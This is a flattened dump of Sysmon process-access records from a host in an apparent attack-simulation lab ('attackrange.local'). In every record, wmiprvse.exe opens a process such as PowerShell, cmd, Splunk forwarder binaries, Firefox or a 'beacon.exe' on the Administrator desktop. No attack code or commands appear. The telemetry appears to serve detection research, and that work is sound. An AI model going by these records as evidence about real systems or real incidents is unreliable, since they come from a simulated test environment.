16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 